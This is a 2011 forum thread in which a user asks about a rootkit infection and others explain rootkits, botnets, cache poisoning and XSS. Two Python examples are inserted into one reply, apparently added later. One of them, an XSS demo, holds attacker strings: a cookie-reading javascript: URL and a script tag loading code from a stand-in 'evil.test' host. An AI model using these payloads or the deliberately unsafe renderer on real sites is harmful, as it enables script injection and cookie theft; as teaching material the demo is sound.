General Question

woodcutter

For tech wizards here: Have you heard of the Root Kit virus that is out there now?

Asked by woodcutter (16249 points) September 29th, 2011

Apparently I stumbled into it and my machine got lit up. No, I haven’t been on dirty sites. We have a contract with Cyber Defender and they have been working on this. They have been aware of its existence for some time now. And they aren’t sure they can crack it any time soon. I’m so glad I kept this Windows 98 machine sitting back in the corner of the room. Windows ‘98 sucks.
Is our computer toast?


19 Answers

Lightlyseared

Have you got all the data on your PC backed up? Yes…. Do you have the original install disks for Windows? Then the easiest way to get rid of pretty much any virus is to format the drive and do a clean install of Windows.

King_Pariah

If it’s a “well written” root, yeah your comp may be royally screwed with the only real way of getting rid of it being wiping your computer then downloading your/a new OS. If it’s not, then a good antivirus program on your comp should be able to clear it no praw.

woodcutter

Yes, the techs we spoke with say this machine will have to be wiped and started from scratch. We do have it backed up because, during a power outage a while back, it suffered through a similar thing. It was left on as the power failed, but to this day I don’t understand why that would do anything. If it goes off due to power failure, it’s off and won’t come back on until we turn it back on manually, but what do I know? I haven’t heard of this on the news like some viruses or worms we get warnings for. I have no idea when this got me. I was under the impression Cyber Defender would catch stuff like this, but I guess that was false security on my part.

the100thmonkey

Root kits can be pretty hard to detect and defend against, particularly if the security flaw that they exploit is unpatched.

There’s a good article on them here.

Rootkits can be installed a variety of ways, not just shitty porn sites.

koanhead

A rootkit is not the same as a virus, though it can be installed by a virus. A rootkit allows a remote attacker or a malicious program privileged access to your system (with “Administrator” or “root” privileges, that is, full access to the file system and every other part of the computer.) Once an attacker has privileged access to your system it is very difficult to remove that access.

(I see that @100thmonkey has beaten me to the link above, but I don’t know a better article.)

You can’t depend on commercial products alone to ensure your computing security. You have to learn about it yourself and use good habits or you will be compromised eventually. It is only a matter of time.

For Windows users it’s not even worth trying to repair the damage- just reinstall, or better yet upgrade.

woodcutter

Since I know so little about computers, I don’t even know what I don’t know. I knew prior to putting this q in here my eyes were going to glaze over reading the replies, but I am still grateful for what I have gotten so far and it’s going to help some, I’m sure. We have something to discuss with CD when we get with them again.

Another silly question: what were the writers of this fresh new hell trying to accomplish doing this, if not to be a pain in the balls? Banking passwords or other ways to get some form of compensation? I don’t think they can get anything from us that way; our personal lives/business aren’t tied into all this, or are they?

King_Pariah

New? It isn’t new, I’ve been hearing about these since 2004. And yeah, it’s just a big nice pain in the ass which can result in info being stolen. And pretty much whatever you have on the comp can be stolen. And they can download a program that could allow them to pick up all the keys you pressed over time. As you can imagine, if you do online banking, this could be disastrous.

gorillapaws

It might be worth looking into Linux. It’s safer, prettier, and cheaper (i.e. free) than a windows upgrade. If you just use your machine for the basics, this might be a great alternative to try.

the100thmonkey

Good answers above. I’d add to @gorillapaws and @koanhead‘s points by saying that the best anti-malware software is between the keyboard and the chair – you.

It’s impossible to screen everything at the software level, and an apparently safe website can be compromised to drop viruses and rootkits onto your machine without the knowledge of the owners. Many rootkits are there to hide the activities of another piece of malware from the system’s security software. Despite this, simple things like hovering over a link in an email to see whether the target page actually corresponds with the link, and thinking twice before opening a downloaded file can prevent many problems.

As @gorillapaws recommends, I too would suggest Ubuntu as a good alternative to Windows; it’s very simple and easy to use, and can be installed alongside your current Windows OS so you can go back if you dislike it. It’s also a much tighter OS in terms of security. Try it!

Brian1946

@gorillapaws @the100thmonkey

It’s moments like these that bring joy to the hearts of Jane Goodall and the supporters of Dian Fossey. ;-)

the100thmonkey

@@q ^ ^ p@@
@@(|’‿’|)@@

edit

Hey! Who turned off monospace rendering?

To see the picture as it should be seen, copy the symbols in the post into the answer box.

koanhead

@woodcutter One of the possible uses of a rootkit is to install software on the victims’ computers that performs tasks that benefit the perpetrator. For example, it could install a keylogger that harvested your passwords and other personal information in order to use your identity as a cover for illegal activity. Or it could cause your computer to become part of a “botnet”, a group of compromised computers typically used to perform concentrated attacks on larger networks.

woodcutter

Oh man. I really can’t think of anything I did to get this. What got me wondering was that at times when I knew one mouse click would do, it was taking 2 or 3 to get it done, but it was a newish mouse that was cordless and I figured the batteries were getting old. But after putting new batteries in, nothing improved. The comp was acting slower than usual, so we got in touch with CD to figure this out, and when they got done with us we had no internet at all. What the hell!? I got talked into installing WOT a couple weeks ago to have a heads up for untrustworthy sites, and it was shortly after that things gradually got weird. Not saying that was any problem, but I felt I was doing everything I could to stay out of trouble. But we uninstalled it before the web went out, just because. It looked like it was on the up & up.

When someone sets one of these into action do they have a particular victim in mind or do they let it out and the attacks are hit or miss randomly?

koanhead

@woodcutter Why would you think World Of Tanks would help with security?

Just kidding. By WOT do you mean Web of Trust? That seems like an interesting tool, though I don’t use it. Anonymous crowdsourcing is not a good way to construct a Web of Trust (that’s a different link) because you can’t trust anonymous strangers pretty much by definition. I haven’t read up on the program enough to know how it actually works, but the website indicates that it tracks the users to accomplish this. That’s not good, and it’s not enough. The program does not seem to be open source, so you have to trust the developers that it does what they say it does.

Also, it seems like the WOT program tracks all this activity in a single centralized database. That’s a problem since it’s a single point of failure and potentially vulnerable to MITM – an attacker could poison site ratings that way. Not only that, but how do we know we can trust the maintainers of that database? We thought we could trust the HTTPS certificate authorities; look how that turned out.

Basically, trust-based security is a Good Thing, but trust has to be handled properly. You don’t sign a key unless you know that person AND you have verified their picture ID or some other official ID method. The system has to properly handle trust transitivity (Alice trusts Bob, Bob trusts Carol, so Alice trusts Carol a little) and it needs to be Free and open. Ideally it should be perfectly transparent and every user should have perfect knowledge of the system, but that’s an impossible ideal- so we do the best we can with PGP and the like.

Okay, rant over. Folks, HTTPS is fundamentally broken, but right now it’s what we have, and I still recommend the HTTPS-Everywhere plugin to anyone using a browser (and if your browser doesn’t support it, you should consider switching to one that does.) In a few years we’ll have better tools deployed- most ISPs won’t deploy IPv6 without IPSEC if they do it at all, and DNSSEC should finally remove the cache-poisoning problem once and for all (in addition to possibly replacing HTTPS, assuming you can trust in-addr.arpa).

Finally, to answer your question, malware attacks on PCs are often done in a “shotgun”-style approach. The black hats don’t know or care what’s on your computer, usually they just want to take over one that has network access. That’s because they have in mind attacking a big site like a bank or other company. With a botnet they can overwhelm a company’s Web servers and make their web pages error out so no one can use them. To make a botnet they need as many computers as possible, so they spread malware everywhere they can.
Finally, you said you hadn’t been to any suspicious sites. This assumes that you can know which sites are suspicious (WOT, right?) which would not necessarily be the case even if WOT worked perfectly all the time:

It’s possible for an attacker to take over another site’s url with a technique called cache poisoning – this means you could point your browser to google.com and get a fake site run by someone else. If they did it skillfully enough, you’d never know it wasn’t Google. (This probably wouldn’t work with Google- but the attack on DigiNotar did!). There’s nothing much you as a user can do about this unless you know more about DNS than most.

Also, some sites use something called cross-site scripting or XSS which can silently redirect you to another site or cause your browser to download data from that site. In many cases XSS is innocuous- for example, many OpenID client sites use it to authenticate you against your OpenID provider- but it has many many nefarious uses. It’s also possible for an otherwise reputable site to have these scripts “injected” into their content against their will.
To defend against this I recommend the NoScript plugin. It is pretty flexible, but it blocks pretty much all scripts by default (which means embedded videos won’t work, and Fluther would look totally broken). You have the option of allowing scripts from some sources but not others (for example, if you were on fluther you could choose to allow from fluther.com and quantserve.com but deny from yahooapis.com). It’s good. Everyone should use it.

Well, I see I’ve written a bit of a book here. Hopefully no one will fall asleep halfway through. If it’s boring, I apologize- but I haven’t had my coffee yet!
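The trust-transitivity rule sketched above (Alice trusts Bob, Bob trusts Carol, so Alice trusts Carol a little) and the "don’t sign unless you verified ID" rule can be made concrete. The block below is an added example written for this thread, not PGP or GnuPG code: the 0..1 trust scale, the multiplicative attenuation per hop, the hop limit and the names are all assumptions chosen for illustration, and GnuPG’s own key-validity computation works differently.

```python
"""Trust transitivity with attenuation, as a toy web of trust.

Added example, not PGP/GnuPG code. Assumptions: direct trust is a number in
[0, 1]; derived trust along a path is the product of the edge values, so it
decays with each hop; the best path wins; a signature is refused unless the
signer asserts an out-of-band identity check.
"""
from typing import Dict, List, Tuple

Trust = Dict[str, Dict[str, float]]  # truster -> {trustee: direct trust}


def sign(trust: Trust, signer: str, subject: str, level: float, id_verified: bool) -> None:
    """Record a direct trust statement; refuse unless identity was verified out of band."""
    if not id_verified:
        raise ValueError(f"{signer} must verify {subject}'s identity before signing")
    if not 0.0 <= level <= 1.0:
        raise ValueError("trust level must be in [0, 1]")
    trust.setdefault(signer, {})[subject] = level


def derived_trust(trust: Trust, src: str, dst: str, max_hops: int = 3) -> Tuple[float, List[str]]:
    """Best attenuated trust from src to dst over paths of at most max_hops edges.

    Each hop multiplies the running value by the edge weight; cycles are avoided
    by never revisiting a node already on the current path. Returns (value, path),
    with (0.0, []) when no path exists within the hop limit.
    """
    if src == dst:
        return 1.0, [src]
    best, best_path = 0.0, []

    def walk(node: str, value: float, path: List[str]) -> None:
        nonlocal best, best_path
        if node == dst:
            if value > best:
                best, best_path = value, path
            return
        if len(path) - 1 >= max_hops:
            return
        for nxt, weight in trust.get(node, {}).items():
            if nxt not in path:
                walk(nxt, value * weight, path + [nxt])

    walk(src, 1.0, [src])
    return best, best_path


def build_sample() -> Trust:
    """Constructed web: Alice->Bob 0.9, Bob->Carol 0.8, Carol->Dave 0.5, Alice->Eve 0.3, Eve->Carol 0.9."""
    web: Trust = {}
    sign(web, "Alice", "Bob", 0.9, id_verified=True)
    sign(web, "Bob", "Carol", 0.8, id_verified=True)
    sign(web, "Carol", "Dave", 0.5, id_verified=True)
    sign(web, "Alice", "Eve", 0.3, id_verified=True)
    sign(web, "Eve", "Carol", 0.9, id_verified=True)
    return web


if __name__ == "__main__":
    web = build_sample()
    for who in ("Bob", "Carol", "Dave", "Mallory"):
        value, path = derived_trust(web, "Alice", who)
        print(f"Alice -> {who}: {value:.2f} via {' -> '.join(path) if path else 'no path'}")
```

Alice reaches Carol two ways; the Bob route (0.9 × 0.8 = 0.72) beats the Eve route (0.3 × 0.9 = 0.27), and Dave, one hop further, comes out at 0.36. Mallory, whom nobody has signed, gets zero: the point of the post, that trust has to come from somewhere you verified, falls out of the model directly.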
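The post also mentions scripts being "injected" into an otherwise reputable site. The following added example (not code from the thread) shows the smallest version of that: a page template that splices user-supplied values straight into HTML next to a hardened version that escapes each value for its context and refuses dangerous link schemes. The template, the attacker strings and the host names are constructed for illustration.

```python
"""Cross-site scripting: the vulnerable rendering beside its hardened form.

Added example, not code from the original thread. The comment template and the
attacker-supplied strings are constructed; the scheme allowlist is a design
choice for this example.
"""
import re
from html import escape
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https", "mailto"}


def render_unsafe(name: str, homepage: str, comment: str) -> str:
    """Vulnerable: untrusted strings are spliced straight into HTML (attribute and body contexts)."""
    return f'<p><a href="{homepage}">{name}</a> wrote: {comment}</p>'


def safe_url(url: str) -> str:
    """Allow only known-harmless schemes; javascript:, data: and the like become a dead link.

    C0 control characters and spaces are removed first because browsers ignore
    them inside a scheme, so "java\\tscript:" would otherwise slip past the check.
    Relative URLs (no scheme) pass through unchanged.
    """
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return "#"
    return cleaned


def render_safe(name: str, homepage: str, comment: str) -> str:
    """Hardened: every untrusted value is HTML-escaped for its context; the URL is scheme-checked first."""
    return (
        f'<p><a href="{escape(safe_url(homepage), quote=True)}">{escape(name)}</a>'
        f" wrote: {escape(comment)}</p>"
    )


# Constructed attacker input: a script-URL in the link and a script tag in the comment body.
NAME = "Mallory"
HOMEPAGE = "java\tscript:alert(document.cookie)"
COMMENT = 'nice post <script src="https://evil.test/drop.js"></script>'

if __name__ == "__main__":
    print("unsafe:", render_unsafe(NAME, HOMEPAGE, COMMENT))
    print("safe:  ", render_safe(NAME, HOMEPAGE, COMMENT))
```

Escaping alone does not fix the link: `javascript:alert(...)` contains no characters that HTML escaping touches, so the attribute context needs its own rule (the scheme allowlist) on top of escaping. That is why the hardened renderer treats the two values differently.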

woodcutter

@koanhead Hey, no, don’t sweat the longish reply. I think topics like this are impossible to explain in an abbreviated format, although if someone doesn’t understand the basics of it, there will be a need to get help using all the ideas gathered, and hopefully the people chosen to assist will make assessments in the user’s best interest. I just happen to be caught in that generational group that never had computers growing up or even needed them for a job or school. There are still a few of us out there. There will be things that are intuitive enough to get, and then there are the ones that will fly right over my head, like computers, and cell phones, DVD players. I’m so glad that VCRs are about gone because I never understood them either. If an invention isn’t put into action by physically swinging something, Imma gonna be in trouble.

the100thmonkey

@woodcutter – this is not intended as an attack, rather a friendly criticism: if you decide that it is all over your head, it is.

If, on the other hand, you decide that it’s both understandable and actually quite simple, it is.

You just need to break it down, or find a suitable source where all the technical jargon is broken down for you. Again, not a criticism, but @koanhead‘s response, while impeccably correct, is rather technical. The issue is breaking up what is a very good post into chunks that a novice user can work with. If you wish, I will try to do so tomorrow, for it’s late and I’m tired, and I need @koanhead‘s help to do it properly.

koanhead

@the100thmonkey That last response of mine was not meant to be any sort of general guide, just some musings on the current state of things with some links I hoped folks would find useful.
If you and other folks think that a basic sort of guide to network security would be useful, I’d be happy to work one up in the next couple of days and perhaps post a link in my profile or some such. If you’d like to collaborate on it your input would be most welcome. Otherwise I think I’ll write it up in one of my blogs later this weekend and then link to it.

woodcutter

I really didn’t feel I was being made sport of. I knew before doing this there were going to be things offered that may confuse me. I’m a big boy but I’m old, but mostly big.

lightsourcetrickster

I notice WOT getting thrown into the mix there. WOT is not as trustworthy as it appears to be. There have been articles on this matter,
http://www.resourcesforlife.com/docs/item5706 being one such article.
The problem with it is that, as stated, it’s open to abuse.
I did use it at one point, and I will say I did a lot of digging around when I first started reading stories about it, and basically I uninstalled WOT pretty quickly. I wouldn’t bother using it – not because I run a web-based business (I don’t, as a matter of fact), but because there is simply far too much abuse being gotten away with. Web of Trust, to that extent, is a no-no.
